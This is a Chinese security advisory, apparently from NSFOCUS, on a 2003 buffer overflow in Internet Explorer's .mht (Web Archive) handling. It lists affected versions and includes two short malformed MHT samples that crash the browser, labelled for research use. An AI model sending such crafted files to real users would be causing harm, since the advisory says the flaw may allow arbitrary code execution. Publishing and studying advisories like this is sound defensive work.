首页 -> 安全研究

安全研究

安全漏洞
Microsoft Internet Explorer .MHT文件远程缓冲区溢出漏洞

发布日期:2003-03-10
更新日期:2003-03-18

受影响系统:
Microsoft Internet Explorer 6.0SP1
Microsoft Internet Explorer 5.5SP2
Microsoft Internet Explorer 5.5SP1
Microsoft Internet Explorer 5.5
Microsoft Internet Explorer 6.0
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows 98 SE
    - Microsoft Windows 98
    - Microsoft Windows 2000 Server SP2
    - Microsoft Windows 2000 Server SP1
    - Microsoft Windows 2000 Server
    - Microsoft Windows 2000 Professional SP2
    - Microsoft Windows 2000 Professional SP1
    - Microsoft Windows 2000 Professional
    - Microsoft Windows 2000 Datacenter Server SP2
    - Microsoft Windows 2000 Datacenter Server SP1
    - Microsoft Windows 2000 Datacenter Server
    - Microsoft Windows 2000 Advanced Server SP2
    - Microsoft Windows 2000 Advanced Server SP1
    - Microsoft Windows 2000 Advanced Server
描述:
BUGTRAQ  ID: 7057

Microsoft Internet Explorer是一款流行的WEB浏览器。

MSIE不充分对.mht文件进行边界缓冲区检查,远程攻击者利用这个漏洞构建恶意.mht文件,诱使用户访问,触发缓冲区溢出。

MSIE5中介绍了新的'Web Archive'格式用于存储WEB页,即可以将HTML页面,包括内链的图片,保存为单个的mht文件。mht文件遵循MIME标准,包括IE、Outlook在内的许多软件可以直接打开。如果.mht文件中编码的数据是可执行文件或Content-Type没有定义和包含'MZP'代码,就会发生缓冲区溢出,而使MSIE崩溃,精心构建恶意.mht文件,可能以当前用户进程权限在系统上执行任意指令。

<*来源:Tom Tanaka (tomatell@canon-sol.jp
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=104740009526273&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Tom Tanaka (tomatell@canon-sol.jp)提供了如下测试方法:

下面是一般用于Web Archive的格式:

----------------------------------------------
From: <Saved from Microsoft Internet Explorer 5>
Subject: =?iso-2022-jp?B?
GyRCJT0lVSVIJSYlJyUiJVclbSVAJS8lSBsoQiBIb21lUGFnZQ==?=
Date: Tue, 4 Mar 2003 02:16:23 +0900
MIME-Version: 1.0
Content-Type: multipart/related;
    boundary="----=_NextPart_000_0000_01C2E1F4.0D559EA0";
    type="text/html"
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106

This is a multi-part message in MIME format.

------=_NextPart_000_0000_01C2E1F4.0D559EA0
Content-Location:file:///tomatell.exe
Content-Transfer-Encoding: base64

TVpQ
----------------------------------------------

下面的格式是包含畸形MIE头,包含BASE64编码的可执行文件,当IE读取,可使IE崩溃:

----------------------------------------------
MIME-Version: 1.0
------=_NextPart_000_0000_01C2E1F4.0D559EA0
Content-Location:file:///tomatell.exe
Content-Transfer-Encoding: base64

TVpQ
----------------------------------------------

建议:
厂商补丁:

Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.microsoft.com/windows/ie/default.asp

浏览次数:3479
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障